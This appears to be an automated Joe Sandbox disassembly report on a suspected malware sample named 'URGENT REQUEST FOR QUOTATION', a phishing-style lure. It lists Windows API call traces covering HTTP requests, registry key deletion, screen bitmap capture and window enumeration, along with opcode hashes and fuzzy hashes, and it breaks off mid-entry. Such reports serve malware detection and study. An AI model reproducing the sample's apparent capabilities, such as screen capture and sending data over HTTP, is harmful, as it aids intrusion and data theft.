                                                                                                                      • API String ID: 2429346358-3619404913
                                                                                                                      • Opcode ID: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                                                                                                      • Instruction ID: b017b32c78e96bad3adf4aecd18c57a2643719f05fcddfc59068efa8916e4db6
                                                                                                                      • Opcode Fuzzy Hash: 91d13ae90adc0093fd39a620bee8aee1170fd3025f0364d5873497be6267cfd6
                                                                                                                      • Instruction Fuzzy Hash: 55716774104244AFEB21CF18DC48FAABBF9FF89304F04042EF98A87261C776A946DB11
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 000C9147
                                                                                                                        • Part of subcall function 000C7674: ClientToScreen.USER32(?,?), ref: 000C769A
                                                                                                                        • Part of subcall function 000C7674: GetWindowRect.USER32(?,?), ref: 000C7710
                                                                                                                        • Part of subcall function 000C7674: PtInRect.USER32(?,?,000C8B89), ref: 000C7720
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000C91B0
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000C91BB
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000C91DE
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000C9225
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 000C923E
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9255
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 000C9277
                                                                                                                      • DragFinish.SHELL32(?), ref: 000C927E
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000C9371
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                      • API String ID: 221274066-3440237614
                                                                                                                      • Opcode ID: 19fad3827b6fa825de12d9085d20fe30c379c5d84d5b1fe9cffd26ab3b556ac1
                                                                                                                      • Instruction ID: 52f470cfe74db63665b0c585fe9429c552b44cc340035f33e815f0eee2c589a2
                                                                                                                      • Opcode Fuzzy Hash: 19fad3827b6fa825de12d9085d20fe30c379c5d84d5b1fe9cffd26ab3b556ac1
                                                                                                                      • Instruction Fuzzy Hash: 22617A71108301AFE701DF64DC89EAFBBE8FF89750F00092EF595921A1DB709A49CB52
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000AC4B0
                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC4C3
                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC4D7
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000AC4F0
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 000AC533
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000AC549
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000AC554
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000AC584
                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 000AC5DC
                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 000AC5F0
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000AC5FB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                      • Opcode ID: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                                                                                                      • Instruction ID: 11b651ea5bc8e67933e2d4d2cb9fd2c4018ef2b4f1ea5e0a2fa157deb7b4f59b
                                                                                                                      • Opcode Fuzzy Hash: 1f7fabff16f2035fe4700e455e621be117cf2b7f4995371c366ebf397a907563
                                                                                                                      • Instruction Fuzzy Hash: FE516DB0500604BFFB218FA0C948EAB7BFCFF09744F014519F94A96610DB34E944DB60
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 000C8592
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 000C85A2
                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 000C85AD
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000C85BA
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 000C85C8
                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000C85D7
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 000C85E0
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000C85E7
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 000C85F8
                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,000CFC38,?), ref: 000C8611
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 000C8621
                                                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 000C8641
                                                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 000C8671
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 000C8699
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000C86AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3840717409-0
                                                                                                                      • Opcode ID: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                                                                                                      • Instruction ID: 32152631a708fe18898ae450fa3a062024e5e919e0ada5931f875db4321d4c9d
                                                                                                                      • Opcode Fuzzy Hash: 7ef429d8cf9316a65b0a1cd253b75e7c67077e488775c452ec1867f5034f1a5f
                                                                                                                      • Instruction Fuzzy Hash: BF410A75600204BFEB119FA5DD88EAE7BB8FF89711F148058F909E7260DB749D01DB64
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 000A1502
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 000A150B
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000A1517
                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000A15FB
                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 000A1657
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000A1708
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 000A178C
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000A17D8
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000A17E7
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 000A1823
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                      • API String ID: 1234038744-3931177956
                                                                                                                      • Opcode ID: 2cacfda235353056efac56e22f4fc7f38c9d4eabe0a414961b27f05f3b60e5b4
                                                                                                                      • Instruction ID: bc6d2083f92c7e82dcec5c2161a838949098f11ef6d39a15563569aeb92b7912
                                                                                                                      • Opcode Fuzzy Hash: 2cacfda235353056efac56e22f4fc7f38c9d4eabe0a414961b27f05f3b60e5b4
                                                                                                                      • Instruction Fuzzy Hash: FCD10E71E00A05EBEB209FA4D895BFDB7B5BF46700F10806AE456AF181DB30EC41DBA1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BB6F4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BB772
                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 000BB80A
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BB87E
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BB89C
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 000BB8F2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BB904
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BB922
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000BB983
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BB994
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 146587525-4033151799
                                                                                                                      • Opcode ID: db7d8b6a4b871ff18f0ddb352bbfbb7fd7fa915f72d42fd96b619325c6c6d4c5
                                                                                                                      • Instruction ID: 96951f22c13feca6e884b6fae4d2f18ea9b4bc551357cb50b1bb8483d6b836d8
                                                                                                                      • Opcode Fuzzy Hash: db7d8b6a4b871ff18f0ddb352bbfbb7fd7fa915f72d42fd96b619325c6c6d4c5
                                                                                                                      • Instruction Fuzzy Hash: F1C1AF34208201AFD725DF14C494FAABBE5FF85318F14845CF59A8B2A2CBB5ED45CB91
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000C5504
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C5515
                                                                                                                      • CharNextW.USER32(00000158), ref: 000C5544
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000C5585
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000C559B
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000C55AC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CharNext
                                                                                                                      • String ID: more than two branches
                                                                                                                      • API String ID: 1350042424-2287693473
                                                                                                                      • Opcode ID: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                                                                                                      • Instruction ID: 77b2b532268f8cca6a525c7ceb926acad27a4b7f9afcf1057e45b79ad79c2495
                                                                                                                      • Opcode Fuzzy Hash: 56edf5c68b727cfea2674cfa3f168c9bad3059be28798056aac6bbc2e4b99394
                                                                                                                      • Instruction Fuzzy Hash: 58619038904608AFEF208F54CC84EFF7BB9EB09726F104149F525A7291D774AAC1DB60
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 000B25D8
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 000B25E8
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 000B25F4
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 000B2601
                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 000B266D
                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 000B26AC
                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 000B26D0
                                                                                                                      • SelectObject.GDI32(?,?), ref: 000B26D8
                                                                                                                      • DeleteObject.GDI32(?), ref: 000B26E1
                                                                                                                      • DeleteDC.GDI32(?), ref: 000B26E8
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 000B26F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      • Opcode ID: 74f300bb71ac1c019a6ca66c2b80dc71ee49a000571814987b6ecec07aa7a7c0
                                                                                                                      • Instruction ID: 876d65c138f2d1a39dfb8c82251c390dfd0dd135ce49638b08bbf1eb2e81fef2
                                                                                                                      • Opcode Fuzzy Hash: 74f300bb71ac1c019a6ca66c2b80dc71ee49a000571814987b6ecec07aa7a7c0
                                                                                                                      • Instruction Fuzzy Hash: F861F0B5D00219EFDB14CFA8D884EEEBBB5FF48310F248529E959A7250D774A9418FA0
                                                                                                                      APIs
                                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0006DAA1
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D659
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D66B
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D67D
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D68F
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6A1
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6B3
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6C5
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6D7
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6E9
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D6FB
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D70D
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D71F
                                                                                                                        • Part of subcall function 0006D63C: _free.LIBCMT ref: 0006D731
                                                                                                                      • _free.LIBCMT ref: 0006DA96
                                                                                                                        • Part of subcall function 000629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000), ref: 000629DE
                                                                                                                        • Part of subcall function 000629C8: GetLastError.KERNEL32(00000000,?,0006D7D1,00000000,00000000,00000000,00000000,?,0006D7F8,00000000,00000007,00000000,?,0006DBF5,00000000,00000000), ref: 000629F0
                                                                                                                      • _free.LIBCMT ref: 0006DAB8
                                                                                                                      • _free.LIBCMT ref: 0006DACD
                                                                                                                      • _free.LIBCMT ref: 0006DAD8
                                                                                                                      • _free.LIBCMT ref: 0006DAFA
                                                                                                                      • _free.LIBCMT ref: 0006DB0D
                                                                                                                      • _free.LIBCMT ref: 0006DB1B
                                                                                                                      • _free.LIBCMT ref: 0006DB26
                                                                                                                      • _free.LIBCMT ref: 0006DB5E
                                                                                                                      • _free.LIBCMT ref: 0006DB65
                                                                                                                      • _free.LIBCMT ref: 0006DB82
                                                                                                                      • _free.LIBCMT ref: 0006DB9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 161543041-0
                                                                                                                      • Opcode ID: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                                                      • Instruction ID: 551bb117f3117c10848991871839812c617d277902a6eb395c088ae7af53544e
                                                                                                                      • Opcode Fuzzy Hash: d4cec0f93a283829c47e7855e43a06da076d4055ac0969700c7afc81fe69d696
                                                                                                                      • Instruction Fuzzy Hash: 1B315831B08604DFEB65AA79E845BAAB7EBFF40350F15442AE449D7192DF30EC80CB20
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0009369C
                                                                                                                      • _wcslen.LIBCMT ref: 000936A7
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00093797
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0009380C
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0009385D
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00093882
                                                                                                                      • GetParent.USER32(?), ref: 000938A0
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 000938A7
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00093921
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0009395D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 4010501982-679674701
                                                                                                                      • Opcode ID: 1f704d4fef368526330657d154a27f105e1f22e9b190a9397feeb6d2df435e75
                                                                                                                      • Instruction ID: 88c7fbfef6435710bda7f19b3ab2e300aeba1fbb666080f69ebe9cf7073f5f9d
                                                                                                                      • Opcode Fuzzy Hash: 1f704d4fef368526330657d154a27f105e1f22e9b190a9397feeb6d2df435e75
                                                                                                                      • Instruction Fuzzy Hash: 8491AD71204606AFDB19DF64C885FEAF7E8FF44350F008629F999D2191DB30AA45DF91
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094994
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 000949DA
                                                                                                                      • _wcslen.LIBCMT ref: 000949EB
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 000949F7
                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094A2C
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094A64
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00094A9D
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00094AE6
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00094B20
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00094B8B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793375393.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793411706.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1793426411.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_30000_URGENT REQUEST FOR QUOTATION.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                      • String ID: ThumbnailClass
                                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                                      • Opcode ID: dff3a6b9a37a678781206f5cb71692ad63dda172c001ea0a62ec1fd92d01f604
                                                                                                                      • Instruction ID: 578f2f02ea53a0c183dcf1abae481083bc79ff63b7ee482a4dad64f02209ced6
                                                                                                                      • Opcode Fuzzy Hash: dff3a6b9a37a678781206f5cb71692ad63dda172c001ea0a62ec1fd92d01f604
                                                                                                                      • Instruction Fuzzy Hash: A291BE710082059FEF14CF14C985FAA77E8FF84314F048469FD899A196EB34ED46DBA2
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCC64
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 000BCC8D
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD48
                                                                                                                        • Part of subcall function 000BCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 000BCCAA
                                                                                                                        • Part of subcall function 000BCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 000BCCBD
                                                                                                                        • Part of subcall function 000BCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 000BCCCF
                                                                                                                        • Part of subcall function 000BCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 000BCD05
                                                                                                                        • Part of subcall function 000BCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 000BCD28
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 000BCCF3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1793329946.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1793315180.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
